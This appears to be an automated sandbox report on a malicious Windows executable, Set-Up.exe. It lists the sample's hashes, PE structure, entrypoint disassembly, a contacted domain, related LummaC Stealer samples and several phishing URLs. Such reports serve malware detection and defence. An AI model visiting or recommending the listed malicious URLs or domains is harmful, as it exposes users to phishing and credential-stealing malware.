                                                                        skatestringje.clickUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1591971
                                                                        Start date and time:2025-01-15 15:59:13 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 4m 38s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:4
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Set-Up.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 95%
                                                                        • Number of executed functions: 6
                                                                        • Number of non-executed functions: 89
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Stop behavior analysis, all processes terminated
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45, 4.245.163.56
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        TimeTypeDescription
                                                                        10:00:24API Interceptor8x Sleep call for process: Set-Up.exe modified
                                                                        No context
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUShttp://www.mcpf.co.zaGet hashmaliciousUnknownBrowse
                                                                        • 104.17.25.14
                                                                        ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.192.161
                                                                        Personliche Nachricht fur e4060738.pdfGet hashmaliciousUnknownBrowse
                                                                        • 104.18.95.41
                                                                        https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3JnGet hashmaliciousPhisherBrowse
                                                                        • 172.66.0.235
                                                                        https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3JnGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.25.14
                                                                        asB3nE8eVsGet hashmaliciousUnknownBrowse
                                                                        • 172.66.0.227
                                                                        https://ummi.asir.com.ar/Get hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        https://aMER.ethamoskag.ru/0cUrcw3/#Mbob@bobco.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.25.14
                                                                        https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                                                        • 1.1.1.1
                                                                        https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/Get hashmaliciousUnknownBrowse
                                                                        • 104.16.123.96
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.75.15
                                                                        00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                                                        • 104.21.75.15
                                                                        00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                                                        • 104.21.75.15
                                                                        138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.75.15
                                                                        92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                                        • 104.21.75.15
                                                                        2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.75.15
                                                                        62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                        • 104.21.75.15
                                                                        87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                                        • 104.21.75.15
                                                                        lumma_phothockey.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.75.15
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.78818972799906
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        File name:Set-Up.exe
                                                                        File size:4'180'480 bytes
                                                                        MD5:76f313ad20bd3da35ef5a7460caf4f95
                                                                        SHA1:49143bd00a24052d706b743fe7b5bc22c20c3316
                                                                        SHA256:e876204ffcf70dda59de05b571e800f5bdfe096c9fbc3714470366201e8e40d1
                                                                        SHA512:ff65504bbf473b9417e456e2cf4bd8d1efd5104af6bd2f77e267d82c2b228795c9780e11d7a2e56001b08d090879503c73782f136b8021fbd2bacc7a81f75e79
                                                                        SSDEEP:49152:LoBfXRxe0XP/kSmciUHmk9kHUuoea2cUKwTKJ74uO7tTV:LotjX9pNi0uoea2NKuuOZZ
                                                                        TLSH:13167D23B385553EC8AA073A5837A654AD3F762136369C4F6AF44D4C9F361802B3B74B
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                        Icon Hash:0686929296964012
                                                                        Entrypoint:0x701178
                                                                        Entrypoint Section:.itext
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x5F455700 [Tue Aug 25 18:22:56 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:ba8c2ef14d8c5cf1cbcc3bca811bd263
                                                                        Signature Valid:
                                                                        Signature Issuer:
                                                                        Signature Validation Error:
                                                                        Error Number:
                                                                        Not Before, Not After
                                                                          Subject Chain
                                                                            Version:
                                                                            Thumbprint MD5:
                                                                            Thumbprint SHA-1:
                                                                            Thumbprint SHA-256:
                                                                            Serial:
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFF0h
                                                                            push ebx
                                                                            mov eax, 006F6510h
                                                                            call 00007FC0009AF6F8h
                                                                            push 007011F8h
                                                                            push 00000001h
                                                                            push 00000000h
                                                                            push 00000000h
                                                                            call 00007FC0009B3B40h
                                                                            mov ebx, eax
                                                                            test ebx, ebx
                                                                            je 00007FC000CA06DCh
                                                                            call 00007FC0009B3C65h
                                                                            cmp eax, 000000B7h
                                                                            je 00007FC000CA06D0h
                                                                            mov eax, dword ptr [0071DF2Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007FC000BA2606h
                                                                            mov eax, dword ptr [0071DF2Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            xor edx, edx
                                                                            call 00007FC000BA4340h
                                                                            mov ecx, dword ptr [0071E094h]
                                                                            mov eax, dword ptr [0071DF2Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            mov edx, dword ptr [006F2BB0h]
                                                                            call 00007FC000BA25F8h
                                                                            mov eax, dword ptr [0071DF2Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007FC000BA2748h
                                                                            push ebx
                                                                            call 00007FC0009B3A9Ah
                                                                            pop ebx
                                                                            call 00007FC0009AA0F4h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ebx+00h], bh
                                                                            inc edx
                                                                            add byte ptr [ebx], dh
                                                                            add byte ptr [44003900h], dh
                                                                            add byte ptr [esi+00h], al
                                                                            xor byte ptr [eax], al
                                                                            inc ebp
                                                                            add byte ptr [41003800h], ch
                                                                            add byte ptr [eax+eax+31h], al
                                                                            add byte ptr [35003400h], ch
                                                                            add byte ptr [edx], dh
                                                                            add byte ptr [edi], dh
                                                                            add byte ptr [31003800h], ch
                                                                            add byte ptr [esi+00h], al
                                                                            xor eax, 46002D00h
                                                                            add byte ptr [ecx+00h], al
                                                                            cmp byte ptr [eax], al
                                                                            xor al, 00h
                                                                            inc ebx
                                                                            add byte ptr [ebp+00h], al
                                                                            inc esi
                                                                            add byte ptr [esi+00h], al
                                                                            inc ebx
                                                                            add byte ptr [esi], dh
                                                                            add byte ptr [eax+eax], dh
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3520000x7d.edata
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x34c0000x4138.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3970000x9a400.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x28cfedf80x2f68
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3550000x41278.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x3540000x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x34cc040xa10.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3510000xa8e.didata
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x2fd3300x2fd4000dd4cf72dd79dd42a6e6826fa5bc5eeaunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .itext0x2ff0000x22480x24005b21e1f84dbc1222b746825775fcb6c0False0.494140625data6.050330167413764IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .data0x3020000x1c24c0x1c400dfca59b96aa7a1a3b7893fbd53fc8f35False0.2870143113938053data5.608868591059476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .bss0x31f0000x2cff40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata0x34c0000x41380x4200839f34fc0718f638548fb409bda055ceFalse0.31019176136363635data5.227274724912847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .didata0x3510000xa8e0xc004013e764f6cf0185ccaf591a307674ceFalse0.3203125data3.8640332491361935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .edata0x3520000x7d0x2009c877d3ec62b360e1547502fe81fd195False0.216796875data1.5311475320385028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .tls0x3530000x4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rdata0x3540000x5d0x20021e564d90e1a827f7e00c4e232a9f325False0.189453125data1.364558174968107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x3550000x412780x414008216932dbffa341b0735501425d7a829False0.5633156728927203data6.722327249661793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x3970000x9a4000x9a4004c133402447961129806f1ca47914803False0.5059543405591572data6.779058353732661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_CURSOR0x398fe80x134dataEnglishUnited States0.43506493506493504
                                                                            RT_CURSOR0x39911c0x134dataEnglishUnited States0.4642857142857143
                                                                            RT_CURSOR0x3992500x134dataEnglishUnited States0.4805194805194805
                                                                            RT_CURSOR0x3993840x134dataEnglishUnited States0.38311688311688313
                                                                            RT_CURSOR0x3994b80x134dataEnglishUnited States0.36038961038961037
                                                                            RT_CURSOR0x3995ec0x134dataEnglishUnited States0.4090909090909091
                                                                            RT_CURSOR0x3997200x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                            RT_CURSOR0x3998540x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                            RT_BITMAP0x3999880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                            RT_BITMAP0x399b580x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                            RT_BITMAP0x399d3c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                            RT_BITMAP0x399f0c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                            RT_BITMAP0x39a0dc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                            RT_BITMAP0x39a2ac0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                            RT_BITMAP0x39a47c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                            RT_BITMAP0x39a64c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                            RT_BITMAP0x39a81c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                            RT_BITMAP0x39a9ec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                            RT_BITMAP0x39abbc0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                            RT_BITMAP0x39ac7c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                            RT_BITMAP0x39ad5c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                            RT_BITMAP0x39ae3c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                            RT_BITMAP0x39af1c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                            RT_BITMAP0x39afdc0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                            RT_BITMAP0x39b09c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                            RT_BITMAP0x39b17c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                            RT_BITMAP0x39b23c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                            RT_BITMAP0x39b31c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                            RT_BITMAP0x39b3dc0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                            RT_ICON0x39b4bc0x962PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8776019983347211
                                                                            RT_ICON0x39be200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.01937182065538862
                                                                            RT_ICON0x3ac6480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08309128630705394
                                                                            RT_ICON0x3aebf00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.08466228893058161
                                                                            RT_ICON0x3afc980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.11790780141843972
                                                                            RT_ICON0x3b01000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5623827392120075
                                                                            RT_ICON0x3b11a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6229508196721312
                                                                            RT_ICON0x3b1b300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6285460992907801
                                                                            RT_ICON0x3b1f980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.38506224066390043
                                                                            RT_ICON0x3b45400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5581613508442776
                                                                            RT_ICON0x3b55e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6344262295081967
                                                                            RT_ICON0x3b5f700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.62677304964539
                                                                            RT_ICON0x3b63d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5322614107883817
                                                                            RT_ICON0x3b89800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6894934333958724
                                                                            RT_ICON0x3b9a280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7204918032786886
                                                                            RT_ICON0x3ba3b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8182624113475178
                                                                            RT_ICON0x3ba8180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4315352697095436
                                                                            RT_ICON0x3bcdc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3543621013133208
                                                                            RT_ICON0x3bde680x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3782786885245902
                                                                            RT_ICON0x3be7f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5203900709219859
                                                                            RT_ICON0x3bec580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.725177304964539
                                                                            RT_ICON0x3bf0c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5836065573770491
                                                                            RT_ICON0x3bfa480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.48334896810506567
                                                                            RT_ICON0x3c0af00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.37946058091286305
                                                                            RT_ICON0x3c30980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.6020788912579957
                                                                            RT_ICON0x3c3f400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.7242779783393501
                                                                            RT_ICON0x3c47e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672, 256 important colorsEnglishUnited States0.630184331797235
                                                                            RT_ICON0x3c4eb00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.4508670520231214
                                                                            RT_ICON0x3c54180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.5407782515991472
                                                                            RT_ICON0x3c62c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.730595667870036
                                                                            RT_ICON0x3c6b680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672, 256 important colorsEnglishUnited States0.6751152073732719
                                                                            RT_ICON0x3c72300x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.4313583815028902
                                                                            RT_ICON0x3c77980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.5074626865671642
                                                                            RT_ICON0x3c86400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.7152527075812274
                                                                            RT_ICON0x3c8ee80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672, 256 important colorsEnglishUnited States0.6514976958525346
                                                                            RT_ICON0x3c95b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.44508670520231214
                                                                            RT_ICON0x3c9b180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.6295309168443497
                                                                            RT_ICON0x3ca9c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.7369133574007221
                                                                            RT_ICON0x3cb2680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672, 256 important colorsEnglishUnited States0.6607142857142857
                                                                            RT_ICON0x3cb9300x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.5072254335260116
                                                                            RT_ICON0x3cbe980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.5471748400852878
                                                                            RT_ICON0x3ccd400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.5555054151624549
                                                                            RT_ICON0x3cd5e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672, 256 important colorsEnglishUnited States0.4573732718894009
                                                                            RT_ICON0x3cdcb00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.3699421965317919
                                                                            RT_ICON0x3ce2180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.3947228144989339
                                                                            RT_ICON0x3cf0c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.4151624548736462
                                                                            RT_ICON0x3cf9680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672, 256 important colorsEnglishUnited States0.396889400921659
                                                                            RT_ICON0x3d00300x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.3157514450867052
                                                                            RT_ICON0x3d05980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5226141078838175
                                                                            RT_ICON0x3d2b400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6083489681050657
                                                                            RT_ICON0x3d3be80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6983606557377049
                                                                            RT_ICON0x3d45700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.799645390070922
                                                                            RT_ICON0x3d49d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4228215767634855
                                                                            RT_STRING0x3d6f800xb0data0.6306818181818182
                                                                            RT_STRING0x3d70300x560DOS executable (COM, 0x8C-variant)0.4113372093023256
                                                                            RT_STRING0x3d75900xb5cdata0.2548143053645117
                                                                            RT_STRING0x3d80ec0x69cdata0.3120567375886525
                                                                            RT_STRING0x3d87880x2dcdata0.412568306010929
                                                                            RT_STRING0x3d8a640x240data0.4427083333333333
                                                                            RT_STRING0x3d8ca40x1c4data0.5309734513274337
                                                                            RT_STRING0x3d8e680x3e8data0.425
                                                                            RT_STRING0x3d92500x3ecdata0.3286852589641434
                                                                            RT_STRING0x3d963c0x2ccdata0.4553072625698324
                                                                            RT_STRING0x3d99080x464StarOffice Gallery theme l, 1677731072 objects, 1st l0.39768683274021355
                                                                            RT_STRING0x3d9d6c0xa0data0.7125
                                                                            RT_STRING0x3d9e0c0xe4data0.6359649122807017
                                                                            RT_STRING0x3d9ef00x114data0.6195652173913043
                                                                            RT_STRING0x3da0040x3d0data0.38524590163934425
                                                                            RT_STRING0x3da3d40x414data0.3726053639846743
                                                                            RT_STRING0x3da7e80x3c0data0.3885416666666667
                                                                            RT_STRING0x3daba80x3d8data0.28252032520325204
                                                                            RT_STRING0x3daf800x3d8data0.4329268292682927
                                                                            RT_STRING0x3db3580x430data0.36847014925373134
                                                                            RT_STRING0x3db7880x664data0.31234718826405866
                                                                            RT_STRING0x3dbdec0x478data0.32604895104895104
                                                                            RT_STRING0x3dc2640x34cdata0.42298578199052134
                                                                            RT_STRING0x3dc5b00x32cdata0.3645320197044335
                                                                            RT_STRING0x3dc8dc0x438data0.3907407407407407
                                                                            RT_STRING0x3dcd140x1acdata0.4672897196261682
                                                                            RT_STRING0x3dcec00xccdata0.6274509803921569
                                                                            RT_STRING0x3dcf8c0x198data0.5612745098039216
                                                                            RT_STRING0x3dd1240x3c8data0.37913223140495866
                                                                            RT_STRING0x3dd4ec0x3b4data0.3407172995780591
                                                                            RT_STRING0x3dd8a00x354data0.3884976525821596
                                                                            RT_STRING0x3ddbf40x304data0.38212435233160624
                                                                            RT_RCDATA0x3ddef80x10data1.5
                                                                            RT_RCDATA0x3ddf080xaa4data0.5029368575624082
                                                                            RT_RCDATA0x3de9ac0x2dataEnglishUnited States5.0
                                                                            RT_RCDATA0x3de9b00x5b2Delphi compiled form 'TBaseSurveyForm'0.4828532235939643
                                                                            RT_RCDATA0x3def640x453Delphi compiled form 'TStyleSelectionForm'0.5121951219512195
                                                                            RT_RCDATA0x3df3b80x353Delphi compiled form 'TTrackBarDialog'0.5229142185663925
                                                                            RT_RCDATA0x3df70c0x958Delphi compiled form 'TUniversalToolbarForm'0.4088628762541806
                                                                            RT_GROUP_CURSOR0x3e00640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                            RT_GROUP_CURSOR0x3e00780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x3e008c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                            RT_GROUP_CURSOR0x3e00a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x3e00b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x3e00c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x3e00dc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x3e00f00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_ICON0x3e01040x4cdataEnglishUnited States0.7894736842105263
                                                                            RT_GROUP_ICON0x3e01500x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e01900x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e01d00x3edataEnglishUnited States0.8870967741935484
                                                                            RT_GROUP_ICON0x3e02100x3edataEnglishUnited States0.8870967741935484
